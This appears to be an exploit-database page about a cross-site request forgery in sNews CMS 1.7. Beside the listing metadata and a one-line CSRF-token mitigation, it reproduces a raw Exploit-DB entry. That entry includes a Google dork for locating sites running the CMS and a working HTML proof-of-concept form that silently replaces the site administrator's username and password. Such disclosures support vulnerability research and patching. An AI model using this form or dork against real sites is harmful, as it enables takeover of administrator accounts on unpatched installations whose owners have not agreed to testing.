header-logo
Suggest Exploit
vendor:
sNews
by:
Ashiyane Digital Security Team
8,8
CVSS
HIGH
Cross Site Request Forgery
352
CWE
Product Name: sNews
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:snewscms:snews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2016

Snews CMS Cross Site Request Forgery

This exploit allows an attacker to change the username and password of the admin without needing the old username and password. The attacker can craft a malicious HTML page with a form containing the new username and password and submit it to the vulnerable website. This will change the admin credentials to the ones specified by the attacker.

Mitigation:

Implementing a CSRF token in the form to verify the authenticity of the request.
Source

Exploit-DB raw data:

# Exploit Title : Snews CMS Cross Site Request Forgery
# Author : Ashiyane Digital Security Team
# Google Dork : "This site is powered by sNews"
# Date :  1/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://snewscms.com/
# Software link : http://snewscms.com/download/snews1.7.1.zip
# Version : 1.7(latest)
#######################################################3
Change Username and Password of admin
We Dont need old user name and old password
<html>
  <!-- CSRF PoC  -->
  <body>
    <form name="form0" action="http://localhost/?action=process&task=changeup" method="POST">
      <input type="hidden" name="uname" value="Attacker" /> // new username
      <input type="hidden" name="pass1" value="Attacker" /> //new password
      <input type="hidden" name="pass2" value="Atacker" />// repeat new password
      <input type="hidden" name="task" value="changeup" />
      <input type="submit" name="submit_pass" value="Save" />
    </form>
  </body>
</html>
####################################################
######### exploit by: Amir.ght #####################
####################################################

Navigation

Suggest Exploit

Services By CQR